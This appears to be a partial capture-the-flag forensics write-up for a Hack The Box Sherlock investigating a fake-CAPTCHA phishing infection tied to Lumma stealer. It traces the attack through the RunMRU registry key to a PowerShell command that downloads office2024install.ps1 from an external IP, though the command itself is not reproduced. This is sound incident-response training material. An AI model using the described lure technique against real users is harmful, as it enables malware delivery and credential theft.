Happy Grunwald contacted the sysadmin, Alonzo, because of issues he had downloading the latest version of Microsoft Office. He had received an email saying he needed to update, and clicked the link to do it. He reported that he visited the website and solved a captcha, but no office download page came back. Alonzo, who himself was bombarded with phishing attacks last year and was now aware of attacker tactics, immediately notified the security team to isolate the machine as he suspected an attack. You are provided with network traffic and endpoint artifacts to answer questions about what happened.
https://app.hackthebox.com/sherlocks/774
**From the scenario we know the victim (Happy Grunwald) solved a fake CAPTCHA, a phishing technique used by lummna stealer. The infection chain likely involved a malicious PowerShell one liner executed from the Run dialog (Win+R). For more details about this technique, you can watch this YouTube video: https://www.youtube.com/watch?v=lSa_wHW1pgQ**
Based on this, useful artifacts to examine include browsing history and downloads, the RunMRU registry key (which lists recent commands or executables run via the Run dialog), PowerShell logs and related Event Viewer entries, as well as the captured network traffic.
we are provided with lots of registry hives , prefetch folder and a pcap
will focus on the victim (happy.grunwald) folder
we will load the victim registry file using registry explorer then we will look for RunMRU (Lists the most recent commands or executables run via the Run dialog.) we can find it in this path
HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
or under the bookmark tab we will find its a a malicious powershell command reaching out to an external ip to download a powershell script called office2024install.ps1 to execute